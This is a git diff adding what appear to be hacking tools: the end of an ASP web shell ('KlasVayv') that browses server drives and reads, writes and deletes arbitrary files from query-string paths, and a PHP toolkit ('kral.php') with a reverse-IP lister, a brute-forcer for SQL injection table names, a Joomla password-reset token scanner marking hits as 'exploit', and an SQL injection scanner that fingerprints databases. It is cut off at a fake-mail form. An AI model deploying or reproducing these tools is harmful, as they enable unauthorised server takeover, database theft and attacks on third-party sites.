+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="4">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="4">
+        <span style="font-size: 2pt">&nbsp;</span></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="153">
+  <tr>
+    <td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" height="113" bgcolor="#E1E1E1">&nbsp;<div align="center">
+      <center>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber2" height="17">
+        <tr>
+          <td width="208" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Sürücü Adı</font></td>
+          <td width="75" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Boyutu</font></td>
+          <td width="75" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Boş Alan</font></td>
+          <td width="64" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Durum</font></td>
+          <td width="62" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">İşlem</font></td>
+        </tr>
+      </table>
+      </center>
+    </div>
+    <div align="center">
+      <center>
+
+
+	<%
+	set klassis =server.createobject("scripting.filesystemobject")
+	set klasdri=klassis.drives
+	%>
+	
+	<%
+	for each dongu in klasdri
+	%>
+			
+	<%
+	if dongu.driveletter <> "A" then
+	if dongu.isready=true then
+	%>
+
+	<%
+	select case dongu.drivetype
+	case 0 teype="Diğer"
+	case 1 teype="Taşınır"
+	case 2 teype="HDD"
+	case 3 teype="NetWork"
+	case 4 teype="CD-Rom"
+	case 5 teype="FlashMem"
+	end select
+	%>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber3" height="17">
+        <tr>
+          <td width="208" height="17" align="left" bgcolor="#EEEEEE">
+          <font face="Verdana" style="font-size: 8pt">&nbsp;<%=dongu.driveletter%>:\ ( <%=dongu.filesystem%> )</font></td>
+          <td width="75" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=Round(dongu.totalsize/(1024*1024),1)%> MB</font></td>
+          <td width="75" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=Round(dongu.availablespace/(1024*1024),1)%> MB</font></td>
+          <td width="64" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=teype%>&nbsp;</font></td>
+          <td width="62" height="17" align="center" bgcolor="#E0E0E0">
+          <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber24">
+            <tr>
+          <td width="62" height="17" align="center" bgcolor="#E0E0E0"
+          onmouseover="this.style.background='#A0A0A0'"
+          onmouseout="this.style.background='#E0E0E0'"
+          style="CURSOR: hand"
+          
+          >
+          <a href="klasvayv.asp?klas=<%=dongu.driveletter%>:\" style="text-decoration: none">
+          <font face="Verdana" style="font-size: 8pt" color="#000000">Gir</font></a></td>
+            </tr>
+          </table>
+          </td>
+        </tr>
+      </table>
+
+	<%
+	end if
+	end if
+	%>
+<%
+next
+%>
+
+
+
+      </center>
+    </div>
+    <div align="center">
+      <center>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber4" height="4">
+        <tr>
+          <td width="484" height="4" align="center" bgcolor="#C5C5C5">
+          <span style="font-size: 2pt">&nbsp;</span></td>
+        </tr>
+      </table>
+      </center>
+    </div>
+    <p>&nbsp;</p>
+    </td>
+  </tr>
+  <tr>
+    <td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+
+
+
+
+<%
+else
+%>
+
+
+
+
+
+<%
+if request.querystring("kaydet") <> "" then
+set dossisx=server.createobject("scripting.filesystemobject")
+set dosx=dossisx.opentextfile(request.querystring("kaydet"), 2, true)
+dosx.write request("duzenx")
+dosx.close
+set dosyax=nothing
+set dossisx=nothing
+
+end if
+%>
+
+
+
+
+<%
+if request.querystring("duzenle") <> "" then
+set dossis=server.createobject("scripting.filesystemobject")
+set dos=dossis.opentextfile(request.querystring("duzenle"), 1)
+sedx = dos.readall
+dos.close
+set dosya=nothing
+set dossis=nothing
+
+set aktifklas=request.querystring("klas")
+%>
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("duzenle"))%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    <form method="POST" action="klasvayv.asp?kaydet=<%=request.querystring("duzenle")%>&klas=<%=aktifklas%>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="163" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
+  <tr>
+    <td width="100%" align="right">
+    <p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><a href="klasvayv.asp"><input type="reset" size="16"
+		name="x" value="Vazgeç"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></a></td>
+  </tr>
+</table>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#EAEAEA">
+    <p align="right">
+	&nbsp;</td>
+  </tr>
+</table>
+
+
+
+<%
+else
+%>
+
+
+<%
+
+if request.querystring("klas") <> "" then
+aktifklas=Request.querystring("klas")
+if request.querystring("usak") = "1" then
+aktifklas=aktifklas & "\"
+end if
+
+else
+aktifklas=server.mappath("/")
+aktifklas=aktifklas & "\"
+end if
+
+if request.querystring("silklas") <> "" then
+set sis=createobject("scripting.filesystemobject")
+silincekklas=request.querystring("silklas")
+sis.deletefolder(silincekklas)
+set sis=nothing
+'response.write(sil & "  Silindi")
+end if
+
+if request.querystring("sildos") <> "" then
+silincekdos=request.querystring("sildos")
+set dosx=createobject("scripting.filesystemobject")
+set dos=dosx.getfile(silincekdos)
+dos.delete
+set dos=nothing
+set dosyasis=nothing
+end if
+
+
+
+
+select case aktifklas
+case "C:" aktifklas="C:\"
+case "D:" aktifklas="D:\"
+case "E:" aktifklas="E:\"
+case "F:" aktifklas="F:\"
+case "G:" aktifklas="G:\"
+case "H:" aktifklas="H:\"
+case "I:" aktifklas="I:\"
+case "J:" aktifklas="J:\"
+case "K:" aktifklas="K:\"
+end select
+
+
+
+if aktifklas=("C:") then aktifklas=("C:\")
+
+Set FS = CreateObject("Scripting.FileSystemObject")
+Set klasor = FS.GetFolder(aktifklas)
+Set altklasorler = klasor.SubFolders
+Set dosyalar = klasor.files
+%>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(aktifklas)%></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13">
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+                <a href="klasvayv.asp?usklas=1&klas=<%=server.urlencode(left(aktifklas,(instrRev(aktifklas,"\"))-1))%>" style="text-decoration: none">
+                <font color="#000000">Üst Klasör</font></a></font></td>
+                
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a href="klasvayv.asp?suruculer=1" style="text-decoration: none">
+        <font color="#9F9F9F">Sürücüler</font></a></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="klasvayv.asp?klasac=1&aktifklas=<%=aktifklas%>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klasör</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="klasvayv.asp?yenidosya=<%=aktifklas%>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+
+			
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Adı</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;İşlem</font></td>
+  </tr>
+</table>
+
+
+
+<% For each oge in altklasorler %> 
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%>&nbsp;</font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="klasvayv.asp?klas=<%=aktifklas%><%=oge.name%>\" style="text-decoration: none">
+        <font color="#000000">Aç</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="klasvayv.asp?silklas=<%=aktifklas & oge.name & "&klas=" & aktifklas %>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<% Next %>
+			    
+
+<% For each oge in dosyalar %> 
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%> </font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( <%=Round(oge.size/1024,1)%> KB )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="klasvayv.asp?duzenle=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>">
+        <font color="#000000">Düzenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="klasvayv.asp?sildos=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<% Next %>
+
+
+
+<%
+if aktifklas=("C:\") then aktifklas=("C:")
+%>
+
+
+<%
+end if
+%>
+
+
+
+<%
+end if
+%>
+
+
+<%
+end if
+%>
+
+
+<%
+end if
+%>
+
+<%
+end if
+%>
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+</body>
+
+</html>
\ No newline at end of file
diff --git a/php/kral.php b/php/kral.php
new file mode 100644
index 0000000..878b535
--- /dev/null
+++ b/php/kral.php
@@ -0,0 +1,371 @@
+<?PHP
+/*
+Kodlama by BLaSTER
+from TurkGuvenligi
+*/
+ini_set('max_execution_time',0);
+ob_start();
+$tablo = "admin
+admins
+users
+uyeler
+uye
+kullanici
+kullanicilar
+member
+members
+haber
+haberler
+anket
+administrator
+editor
+editors
+webmaster
+diary
+admin
+a_admin
+x_admin
+m_admin
+adminuser
+admin_user
+adm
+article_admin
+administrator
+manage
+manager
+member
+memberlist
+tbluser
+tbl_user
+tbl_users
+user
+users
+userinfo
+user_info
+admin_userinfo
+userlist
+user_list
+login
+reguser
+movie
+movies
+news
+password
+clubconfig
+config
+company
+book
+art
+bbs
+dv_admin
+webmaster";
+?>
+<style type="text/css">
+<!--
+body,td,th {
+color: #FFFFFF;
+font-family: tahoma;
+font-size: 11px;
+}
+body {
+background-color: #000000;
+}
+.style4 {font-weight: bold}
+a:link {
+color: #CCCCCC;
+}
+a:visited {
+color: #CCCCCC;
+}
+a:hover {
+color: #666666;
+}
+a:active {
+color: #CCCCCC;
+}
+-->
+table{border:1px solid #FFFFFF;}
+tr{border:1px solid #FFFFFF;}
+td{border:1px solid #FFFFFF;}
+input{background-color:#CCCCCC;
+font-family:Georgia, "Times New Roman", Times, serif;
+color:#000000;
+border:1px dashed #FFFFFF;
+font-size:12px;}
+textarea{background-color:#CCCCCC;
+font-family:Georgia, "Times New Roman", Times, serif;
+color:#000000;
+border:1px dashed #FFFFFF;
+font-size:12px;}
+.style6 {
+font-size: 24px;
+font-weight: bold;
+font-style: italic;
+}
+</style>
+<title>BLaSTER</title>
+
+  <div align="center">
+    <table width="887" border="1">
+      <tr>
+        <td height="50" colspan="3"><div align="center"><span class="style6">By BLaSTER</span><br />
+          TurkGuvenligi Ekibi<br />
+          <br />
+        <a href="<?=$_SERVER['PHP_SELF']?>">sayfayi tekrar aç</a></div></td>
+      </tr>
+      <tr>
+        <td width="275" valign="top"><form action="" method="post" name="reverse" id="form1">
+            <p><strong>Server listeleyici</strong><br />
+              <br />
+              <input name="site" type=text size="40">
+              <input type="submit" value="Tara">
+              <br />
+              <?PHP
+$site=$_POST['site'];
+if($site){
+$ch=curl_init();
+curl_setopt($ch,CURLOPT_URL,"http://www.guerrilladns.com/index.php");
+curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
+curl_setopt($ch,CURLOPT_POST,1);
+curl_setopt($ch,CURLOPT_POSTFIELDS,"domain=".$site);
+$al=curl_exec($ch);
+curl_close($ch);
+
+preg_match_all('#rel="nofollow" >(.*?)</a>#si',$al,$ver);
+
+
+foreach($ver[1] as $cikti){
+ob_flush();
+flush();
+usleep(100000);
+echo $cikti.'<br>';
+}
+}
+?>
+            </p>
+        </form></td>
+        <td width="282" height="100" valign="top" bordercolor="#FFFFFF"><form method="post" action="">
+          <form action="" method="post" name="form1" id="form1">
+            <p><strong>Tablo bulucu<br />
+              </strong><br />
+              Site:
+              <input name="site2" type="text" id="site" size="45" />
+              <br />
+              <br />
+              Referans olacak kodu giriniz:
+              <input name="refkod" type="text" id="refkod" value="cannot find the input table or query" size="40" />
+            </p>
+            <label><br />
+            <textarea name="tablo" cols="50" rows="3" id="tablo"><?=$tablo?>
+            </textarea>
+            </label>
+            <label> <br />
+            <input name="submit1" type="submit" id="submit1" value="Ara ve bul" />
+            </label>
+            <br />
+            <?PHP
+$tablo=htmlspecialchars($_POST['tablo']);
+$site=$_POST['site'];
+$refkod=$_POST['refkod'];
+if($site && $tablo && $refkod){
+$satirlar=explode("\n",$tablo);
+foreach($satirlar as $s){
+$son = $site." ".$s;
+$son2 = str_replace(" ","+",$son);
+$son3 = trim($son2);
+ob_flush();
+flush();
+usleep(100000);
+$ch=curl_init();
+curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
+curl_setopt($ch,CURLOPT_URL,$son3);
+$al=curl_exec($ch);
+curl_close($ch);
+if(eregi($refkod,$al)){
+echo $s . '--> <font color="red">yok</font><br>' ;
+}else{
+echo $s . '--> <font color="green">var</font><br>' ;}
+}
+}
+?>
+          </form></td>
+        <td width="308" valign="top" bordercolor="#FFFFFF"><form action="" method="post" name="form2" id="form2">
+          <p>
+            <label></label>
+            <label><strong>Hex çevirici <br />
+            <br />
+            <input name="hex" type="text" id="hex" size="40" />
+            </strong></label>
+            <strong>
+            <input name="submit2" type="submit" id="submit2" value="Çevir" />
+            <br />
+            <?PHP
+  $hex=htmlspecialchars($_POST['hex']);
+if($hex){
+echo '0x'.bin2hex($hex);
+}
+  ?>
+            </strong></p>
+        </form>
+            <form action="" method="post" name="form3" id="form3">
+              <strong>Ip adresi alici </strong><br />
+              <br />
+              <label>
+                <input name="ip" type="text" id="ip" size="40" />
+              </label>
+              <label>
+                <input name="submit3" type="submit" id="submit3" value="Göster" />
+              </label>
+              <div align="left">
+                <?PHP
+$ip=htmlspecialchars($_POST['ip']);
+if($ip){
+$adres=gethostbyname($ip);
+echo '<font color="red">'.$ip.'</font> <br> <font color="green">'.$adres.'</font>';
+echo'<br> <a href="http://www.bing.com/search?q=ip%3A'.$adres.'+&go=&form=QBLH&filt=all" target="_blank">Bing arama sayfasini aç</a>';
+}
+?>
+              </div>
+            </form>
+          <form action="" method="post" name="form6" id="form6">
+            <strong>Md5 </strong><br />
+            <br />
+            <label>
+              <input name="md5" type="text" id="md5" size="40" />
+            </label>
+            <label>
+              <input name="submit4" type="submit" id="submit4" value="Olustur" />
+            </label>
+            <span class="style4">
+            <div align="left">
+              <?PHP
+$md5=htmlspecialchars($_POST['md5']);
+if($md5){
+echo md5($md5);
+}
+?>
+            </div>
+            </span>
+        </form>      </td>
+      </tr>
+      <tr>
+        <td width="275" height="100" valign="top" bordercolor="#FFFFFF"><form action="" method="post" name="form5" id="form5">
+          <p><strong>Joomla token<br />
+                <br />
+            </strong>
+              <textarea name="liste2" cols="50" rows="8"></textarea>
+              <br />
+              <input name="submit6" type="submit" id="submit6" value="Taramaya basla" />
+              <br />
+              <?PHP
+$liste=htmlspecialchars($_POST['liste2']);
+if($liste){
+$satirlar=explode("\n",$liste);
+foreach($satirlar as $s){
+ob_flush();
+flush();
+usleep(100000);
+$cikti=trim($s);
+$ekle="/index.php?option=com_user&view=reset&layout=confirm";
+$bla=$cikti."".$ekle;
+$ch=curl_init();
+curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
+curl_setopt($ch,CURLOPT_URL,$bla);
+$al=curl_exec($ch);
+curl_close($ch);
+if(eregi('token',$al)){
+echo '<font color="green">'.$cikti.'</font> --> <font color="green"><a href="http://'.$bla.'" target="_blank">exploit</a></font><br>';
+}else{
+echo $cikti.' --> <font color="red">yok</font><br>';
+}}
+}
+?>
+          </p>
+        </form></td>
+        <td height="100" valign="top" bordercolor="#FFFFFF"><form action="" method="post" name="form4" id="form4">
+          <p><strong>SQL injection tarama</strong><br />
+              <br />
+              <textarea name="liste1" cols="50" rows="8"></textarea>
+              <input name="submit5" type="submit" id="submit5" value="Taramaya basla" />
+              <br />
+              <?PHP
+$liste=htmlspecialchars($_POST['liste1']);
+if($liste){
+$satirlar=explode("\n",$liste);
+foreach($satirlar as $s){
+$tmz=trim($s);
+$son=$tmz.""."1'a";
+ob_flush();
+flush();
+usleep(100000);
+$ch=curl_init();
+curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
+curl_setopt($ch,CURLOPT_URL,$son);
+$al=curl_exec($ch);
+curl_close($ch);
+if(eregi("Unclosed",$al)){
+echo $son.' <br> <font color="green">MSSQL</font><br>';
+}
+elseif(eregi("SQL syntax",$al)){
+echo $son.' <br> <font color="green">MySQL</font><br>';
+}
+elseif(eregi("MySQL",$al)){
+echo $son.' <br> <font color="green">MySQL</font><br>';
+}
+elseif(eregi("Syntax error",$al)){
+echo $son.' <br> <font color="green">Access</font><br>';
+}
+elseif(eregi("Access",$al)){
+echo $son.' <br> <font color="green">Access</font><br>';
+}
+elseif(eregi("JET Database",$al)){
+echo $son.' <br> <font color="green">Jet Db</font><br>';
+}else{
+echo $son.' <br> <font color="red">Yok</font><br>';
+}}
+}
+?>
+          </p>
+        </form></td>
+        <td width="275" height="100" valign="top" bordercolor="#FFFFFF"><form id="form7" name="form7" method="post" action="">
+          <strong>Fake Mail</strong>
+          <p>Gönderen email:
+            <label>
